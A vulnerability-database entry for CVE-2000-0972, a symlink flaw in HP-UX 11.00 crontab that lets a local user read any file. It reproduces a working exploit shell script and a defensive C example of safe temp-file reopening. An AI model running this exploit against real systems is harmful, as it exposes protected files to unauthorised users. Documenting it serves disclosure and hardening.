HP-UX crontab Arbitrary File Read Vulnerability

Vulnerability ID 1106047 Vulnerability Type Unknown
Published 2000-10-20 Updated 2005-05-02
CVE ID CVE-2000-0972
CNNVD-ID CNNVD-200012-153
Platform HP-UX CVSS Score 2.1
|Vulnerability Source
https://www.exploit-db.com/exploits/20329
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-153
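|Vulnerability Details
The crontab version shipped with HP-UX 11.00 is vulnerable. Using the -e option, a local user can read arbitrary files by creating a symbolic link to the target file during the crontab session, exiting the session, and reading the error messages that crontab generates.
|Exploit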
source: http://www.securityfocus.com/bid/1845/info

crontab is a binary in the cron package of the HP-UX cron implementation which allows a user to create a file of scheduled commands. A vulnerability in crontab exists that allows a user to read any file on an HP-UX system. crontab as implemented in HP-UX is an access-controlled binary: users are permitted to run crontab only if they have an access entry in the crontab.allow file.

To create a crontab, a user must execute the command "crontab -e". Executing this command launches the vi editor and creates a file in the /tmp directory owned by the user running the command. While the file exists in /tmp, the owner of the file may spawn a shell from vi and create a symbolic link to any file on the system. After the user exits the spawned shell and then quits vi, an error message returns the contents of the previously symbolically linked file on the user's standard output.


#!/bin/sh
#
#  HP-UX 11.00 crontab
#
#  Kyong-won,Cho
#
#             [email protected]
#
#  Usage : ./crontab.sh <distfile>
#
#

if [ -z "$1" ]
then

echo "Usage : $0 <distfile>"
exit

fi

cat << _EOF_ > /tmp/crontab_exp
#!/bin/sh

ln -sf $1 $1

_EOF_

chmod 755 /tmp/crontab_exp

EDITOR=/tmp/crontab_exp
export EDITOR

crontab -e 2> /tmp/crontab$$

grep -v "error on previous line" /tmp/crontab$$

rm -f /tmp/crontab_exp /tmp/crontab$$
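
A defensive counterpart to the flaw described above, as an added example that is not part of the original advisory or of HP's code: a privileged tool re-opens its editor temp file only if the path is not a symbolic link and still names the file it created. It assumes a modern POSIX system with O_NOFOLLOW and an editor that rewrites the file in place; the function names and sample paths are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create the edit file; record its identity (device, inode) in *id.
 * Keep the returned fd open so the inode number cannot be reused. */
int create_edit_file(char *tmpl, struct stat *id)
{
    int fd = mkstemp(tmpl);               /* O_CREAT|O_EXCL, mode 0600 */
    if (fd >= 0 && fstat(fd, id) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Re-open the path after the editor exits. Returns a read-only fd, or -1
 * if the path is a symlink or no longer names the file that was created. */
int reopen_edit_file(const char *path, const struct stat *id)
{
    struct stat now;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;                        /* ELOOP: last component is a symlink */
    if (fstat(fd, &now) != 0 || !S_ISREG(now.st_mode) ||
        now.st_dev != id->st_dev || now.st_ino != id->st_ino) {
        close(fd);                        /* hard link or replaced file */
        return -1;
    }
    return fd;
}

int main(void)
{
    char tmpl[] = "/tmp/edit_demoXXXXXX"; /* constructed sample path */
    struct stat id;
    int fd = create_edit_file(tmpl, &id);
    /* Simulate the swap described above with a harmless target. */
    if (fd < 0 || unlink(tmpl) != 0 || symlink("/etc/hostname", tmpl) != 0)
        return 1;
    printf("re-open after swap: %s\n",
           reopen_edit_file(tmpl, &id) < 0 ? "rejected" : "accepted");
    unlink(tmpl);
    close(fd);
    return 0;
}
```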
|References

Source: XF
Name: hp-crontab-read-files
Link: http://xforce.iss.net/static/5410.php
Source: BUGTRAQ
Name: 20001020 [Hackerslab bug_paper] HP-UX crontab temporary file symbolic link vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2000-10/0317.html